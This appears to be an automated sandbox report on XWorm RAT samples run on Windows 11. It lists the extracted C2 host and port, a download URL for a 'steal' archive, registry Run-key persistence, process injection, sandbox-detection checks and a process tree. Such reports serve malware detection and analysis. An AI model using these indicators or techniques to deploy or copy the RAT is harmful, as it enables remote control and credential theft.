Analysis
max time kernel: 1588s
max time network: 1590s
platform: windows11-21h2_x64
resource: win11-20240214-en
resource tags: arch:x64, arch:x86, image:win11-20240214-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 11-04-2024 13:31
Static task: static1
URLScan task: urlscan1

General

Malware Config
Extracted
Family: xworm
Version: 3.1
C2: full-wet.at.ply.gg:38848
Install_directory: %AppData%
install_file: chrome.exe
Signatures

Detect Xworm Payload (2 IoCs)
Processes:
  resource  yara_rule
  behavioral1/memory/2808-1885-0x00000000002A0000-0x00000000002B8000-memory.dmp  family_xworm
  C:\Users\Admin\AppData\Roaming\svchost.exe  family_xworm
Blocklisted process makes network request (8 IoCs)
Processes:
  flow  pid   process
  308   3376  powershell.exe
  316   3376  powershell.exe
  320   6700  powershell.exe
  335   3376  powershell.exe
  339   6700  powershell.exe
  344   3376  powershell.exe
  362   6700  powershell.exe
  373   6700  powershell.exe
Modifies Installed Components in the registry (2 TTPs, 1 IoCs)
Processes:
  description  ioc  process
  Key created  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Active Setup\Installed Components  explorer.exe
Drops startup file (2 IoCs)
Processes:
  description  ioc  process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  svchost.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  svchost.exe
Executes dropped EXE (36 IoCs)
Processes:
  pid   process
  1908  Command Reciever.exe
  3016  Update.exe
  2132  Command Reciever.exe
  4348  Update.exe
  2840  XHVNC-Client.exe
  1372  XWorm V3.1.exe
  2808  svchost.exe
  6312  svchost.exe
  5712  svchost.exe
  6952  svchost.exe
  6568  svchost.exe
  5500  svchost.exe
  1536  svchost.exe
  2728  svchost.exe
  6800  svchost.exe
  5352  svchost.exe
  2088  svchost.exe
  6712  svchost.exe
  6272  svchost.exe
  7008  svchost.exe
  6800  svchost.exe
  7000  b3ownddosser.exe
  6180  b3ownddosser.exe
  2728  b3ownddosser.exe
  4928  b3ownddosser.exe
  1920  b3ownddosser.exe
  4260  svchost.exe
  6544  Command Reciever.exe
  4496  Update.exe
  5588  Command Reciever.exe
  6888  Update.exe
  3508  XHVNC-Client.exe
  4956  svchost.exe
  6448  XHVNC-Client.exe
  6064  svchost.exe
  6664  svchost.exe
Loads dropped DLL (11 IoCs)
Processes:
  pid   process
  1908  Command Reciever.exe
  3016  Update.exe
  2392  XHVNC.exe
  2132  Command Reciever.exe
  4348  Update.exe
  6708  XHVNC.exe
  6544  Command Reciever.exe
  4496  Update.exe
  5588  Command Reciever.exe
  6888  Update.exe
  1604  XHVNC.exe
Obfuscated with Agile.Net obfuscator (1 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
  resource  yara_rule
  behavioral1/memory/2392-626-0x0000000006540000-0x0000000006764000-memory.dmp  agile_net
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 7 IoCs)
Processes:
  description  ioc  process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe"  b3ownddosser.exe  (×5)
  Set value (str)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe"  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"  svchost.exe
Enumerates connected drives (3 TTPs, 4 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description  ioc  process
  File opened (read-only)  \??\D:  explorer.exe
  File opened (read-only)  \??\F:  explorer.exe
  File opened (read-only)  \??\D:  XHVNC.exe
  File opened (read-only)  \??\F:  XHVNC.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 12 IoCs)
Processes:
  flow  ioc
  35    raw.githubusercontent.com
  55    raw.githubusercontent.com
  63    raw.githubusercontent.com
  448   raw.githubusercontent.com
  606   raw.githubusercontent.com
  613   raw.githubusercontent.com
  617   raw.githubusercontent.com
  58    raw.githubusercontent.com
  65    raw.githubusercontent.com
  272   camo.githubusercontent.com
  605   raw.githubusercontent.com
  609   raw.githubusercontent.com
Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  199   ip-api.com
  602   ip-api.com
  35    ip-api.com
Drops file in System32 directory (2 IoCs)
Processes:
  description  ioc  process
  File created  C:\Windows\system32\perfc009.dat  lodctr.exe
  File created  C:\Windows\system32\perfh009.dat  lodctr.exe
Suspicious use of SetThreadContext (10 IoCs)
Processes:
  description  pid  process  target process
  PID 2840 set thread context of 2952  2840  XHVNC-Client.exe  cvtres.exe
  PID 5192 set thread context of 3540  5192  XWorm.exe  AppLaunch.exe
  PID 7128 set thread context of 800  7128  XWorm.exe  AppLaunch.exe
  PID 7000 set thread context of 4800  7000  b3ownddosser.exe  cvtres.exe
  PID 6180 set thread context of 4856  6180  b3ownddosser.exe  cvtres.exe
  PID 2728 set thread context of 5196  2728  b3ownddosser.exe  cvtres.exe
  PID 4928 set thread context of 3288  4928  b3ownddosser.exe  cvtres.exe
  PID 1920 set thread context of 6152  1920  b3ownddosser.exe  cvtres.exe
  PID 3508 set thread context of 2776  3508  XHVNC-Client.exe  cvtres.exe
  PID 6448 set thread context of 6300  6448  XHVNC-Client.exe  cvtres.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) (3 TTPs, 22 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description  ioc  process
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  AcroRd32.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0  Update.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  Update.exe
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Delays execution with timeout.exe (4 IoCs)
Processes:
  pid   process
  4876  timeout.exe
  2384  timeout.exe
  6364  timeout.exe
  3704  timeout.exe
Enumerates processes with tasklist (1 TTPs, 4 IoCs)
Processes:
  pid   process
  3572  tasklist.exe
  396   tasklist.exe
  1212  tasklist.exe
  896   tasklist.exe
Enumerates system info in registry (2 TTPs, 12 IoCs)
Processes:
  description  ioc  process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  chrome.exe
Kills process with taskkill (10 IoCs)
Processes:
  pid   process
  1040  taskkill.exe
  6088  taskkill.exe
  4956  taskkill.exe
  5876  taskkill.exe
  5928  taskkill.exe
  5908  taskkill.exe
  6532  taskkill.exe
  4424  taskkill.exe
  5888  taskkill.exe
  5896  taskkill.exe
Processes:
  description  ioc  process
  Key created  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar  explorer.exe
  Key created  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch  explorer.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"  explorer.exe
  Key created  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"  explorer.exe
  Key created  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser  explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = [binary value omitted]  explorer.exe
  Key created  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main  explorer.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"  explorer.exe
Modifies data under HKEY_USERS (3 IoCs)
Processes:
  description  ioc  process
  Key created  \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry  chrome.exe
  Set value (int)  \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133573161416536741"  chrome.exe
  Key created  \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry  chrome.exe
Modifies registry class (64 IoCs)
Modifies registry key (1 TTPs, 1 IoCs)
NTFS ADS (14 IoCs)
Processes:
  description  ioc  process
  File opened for modification  C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (2).zip:Zone.Identifier  msedge.exe
  File created  C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA  XWorm RAT V2.1.exe
  File opened for modification  C:\Users\Admin\Downloads\XWorm-3.1-main.zip:Zone.Identifier  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\XWorm-RAT-main.zip:Zone.Identifier  msedge.exe
  File created  C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA  XWorm RAT V2.1.exe
  File opened for modification  C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\xworm5.5-main.zip:Zone.Identifier  msedge.exe
  File created  C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA  XWorm RAT V2.1.exe
  File opened for modification  C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier  msedge.exe
  File created  C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA  XWorm RAT V2.1.exe
  File created  C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe\:Zone.Identifier:$DATA  Command Reciever.exe
  File opened for modification  C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip:Zone.Identifier  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\Xworm-RAT-V3.1-main.zip:Zone.Identifier  msedge.exe
Suspicious behavior: AddClipboardFormatListener (7 IoCs)
Processes:
  pid   process
  3156  explorer.exe  (×7)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  pid   process
  4112  msedge.exe  (×2)
  1408  msedge.exe  (×2)
  1532  identity_helper.exe  (×2)
  3064  msedge.exe  (×2)
  3792  msedge.exe  (×2)
  4204  msedge.exe  (×2)
  2452  msedge.exe  (×2)
  1908  Command Reciever.exe  (×19)
  4476  msedge.exe  (×4)
  3016  Update.exe  (×27)
Suspicious behavior: GetForegroundWindowSpam 9 IoCs
Processes:
- 2392 XHVNC.exe
- 3156 explorer.exe
- 1712 OpenWith.exe
- 3016 Update.exe
- 2808 svchost.exe
- 6816 OpenWith.exe
- 6708 XHVNC.exe
- 1604 XHVNC.exe
- 6096 OpenWith.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 60 IoCs
Processes:
- 1408 msedge.exe (15 events)
- 5320 chrome.exe (4 events)
- 2456 msedge.exe (41 events)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- SeDebugPrivilege: 1908 Command Reciever.exe
- SeDebugPrivilege: 896 tasklist.exe
- SeDebugPrivilege: 3016 Update.exe
- SeDebugPrivilege: 2132 Command Reciever.exe
- SeDebugPrivilege: 3572 tasklist.exe
- SeDebugPrivilege: 4348 Update.exe
- SeDebugPrivilege: 2840 XHVNC-Client.exe
- SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating: 3156 explorer.exe (14 events each)
- SeDebugPrivilege: 5888 taskkill.exe
- SeDebugPrivilege: 5908 taskkill.exe
- SeDebugPrivilege: 5876 taskkill.exe
- SeDebugPrivilege: 5896 taskkill.exe
- SeDebugPrivilege: 5928 taskkill.exe
- SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating: 5320 chrome.exe (12 events each)
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
- 1408 msedge.exe (64 events)
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
- 1408 msedge.exe (12 events)
- 3156 explorer.exe (27 events)
- 5320 chrome.exe (24 events)
- 3268 chrome.exe (1 event)
-
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
- 2392 XHVNC.exe (4 events)
- 3016 Update.exe (1 event)
- 4076 StartMenuExperienceHost.exe (1 event)
- 6096 OpenWith.exe (20 events)
- 1712 OpenWith.exe (11 events)
- 4944 AcroRd32.exe (4 events)
- 2808 svchost.exe (1 event)
- 6340 MiniSearchHost.exe (1 event)
- 6816 OpenWith.exe (1 event)
- 6708 XHVNC.exe (3 events)
- 3156 explorer.exe (14 events)
- 6480 OpenWith.exe (1 event)
- 1604 XHVNC.exe (2 events)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
- PID 1408 (msedge.exe) wrote to memory of PID 3560 (msedge.exe): 2 events
- PID 1408 (msedge.exe) wrote to memory of PID 3476 (msedge.exe): 40 events
- PID 1408 (msedge.exe) wrote to memory of PID 4112 (msedge.exe): 2 events
- PID 1408 (msedge.exe) wrote to memory of PID 4924 (msedge.exe): 20 events
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
[level 1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1408)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3560)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f73cb8,0x7ff9a5f73cc8,0x7ff9a5f73cd8
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3476)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4112)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4924)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3648)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2764)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe (PID 1532)
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3472)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2004)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2300)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3592)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3064)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
        - NTFS ADS
        - Suspicious behavior: EnumeratesProcesses
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3792)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2108)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3032)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2724)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5004)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3088)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2320)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:8
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4204)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3332 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2740)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2764)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2480)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3292)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2452)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2976 /prefetch:8
        - NTFS ADS
        - Suspicious behavior: EnumeratesProcesses
    [level 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4476)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4620 /prefetch:2
        - Suspicious behavior: EnumeratesProcesses
-
[level 1] C:\Windows\System32\CompPkgSrv.exe (PID 2448)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
-
[level 1] C:\Windows\System32\CompPkgSrv.exe (PID 1836)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
-
[level 1] C:\Windows\System32\rundll32.exe (PID 896)
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
-
[level 1] C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe (PID 1184)
